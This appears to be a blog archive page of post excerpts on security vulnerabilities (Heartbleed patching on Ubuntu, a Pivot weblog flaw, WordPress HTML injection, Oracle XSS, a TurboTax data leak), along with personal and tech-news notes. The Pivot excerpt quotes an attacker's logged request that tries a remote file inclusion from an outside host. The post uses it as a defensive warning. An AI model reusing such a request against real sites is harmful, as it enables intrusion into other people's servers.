Ubuntu Linux and the Heartbleed OpenSSL vulnerability.

If you're in the mad scramble to patch the Heartbleed vulnerability in OpenSSL on your Ubuntu servers but you need to see some documentation, look in your /usr/share/doc/openssl/changelog.Debian.gz file. If you see the following at the very top of the file, you're patched:

openssl (1.0.1-4ubuntu5.12) precise-security; urgency=medium

  * SECURITY UPDATE: side-channel attack on Montgomery ladder implementation
    - debian/patches/CVE-2014-0076.patch: add and use constant time swap in
      crypto/bn/bn.h, crypto/bn/bn_lib.c, crypto/ec/ec2_mult.c,
      util/libeay.num.
    - CVE-2014-0076
  * SECURITY UPDATE: memory disclosure in TLS heartbeat extension …

Read more...

Remotely exploitable vulnerability found in Pivot v1.40.6!

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP setting is enabled, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

Read more...

WordPress security vulnerability and mitigating strategies.

For the past couple of weeks the information security community has been noticing someone exploiting a new vulnerability in the WordPress blogging software that lets the attacker inject arbitrary HTML code into the content from outside. So far, what has been seen is an HTML entity containing multiple hyperlinks to other sites, presumably for the purpose of artificially bumping up someone's search engine rankings. Both the height and width of the injected HTML code are usually set to zero pixels each, but I've seen a couple of instances of one-by-one entities as well. It stands to reason that pretty much …

Read more...

Oracle sure took its sweet old time patching this...

Oracle is best known for its database system, which many thousands of companies make use of in some capacity or another. It's big, it's bad, it's complex, but it's also got some amazing features, like clustering and replication, that many other databases (open source and otherwise) can't hold a candle to, assuming that you understand it well enough to make it work. It's a complex beast, no two ways about it. That complexity, however, is no excuse for taking two years to patch a security vulnerability in Oracle 10. It's a cross-site scripting bug in the enterprise search subsystem …

Read more...

TurboTax web application security vulnerability.

A customer of the TurboTax web application discovered by accident that it is possible to look at tax information belonging to other customers who happen to share your last name, simply by attempting to view past tax filings. By 'tax information' I mean everything, from Social Security Numbers to bank account numbers and routing codes.

Here's hoping they audited the code in that web app and fixed it before anyone else had a chance to discover the bug and take advantage of it.

Archive: 20070108

Note to self: All the walking in DC is making me go through tennis socks faster than I can replace them. I've blown through six socks in three days because they've ripped through without warning while walking down the street. This is a little annoying because I feel like a slob. It's 2007, so the time for upgrading is probably upon most of us. To wit, here's something that should leave just about everyone drooling in anticipation: This coming Thursday, Hitachi will put their one terabyte hard drives on the consumer market with an opening price of $399 US. The drives …

Read more...

Archive: 20070109

Here's an article just in from the "In other news, fire is hot and water is wet" department: A study shows that studies funded by companies tend to frame the products of those companies in a better light. A three-step study of 111 dietetic studies of soda, milk, and water was performed in such a way that the groups of researchers were ignorant of the conclusions of the others (the protocol is outlined in the article, it's pretty neat) to determine if the findings of the studies would be helpful or harmful to the bottom line of the organisation …

Read more...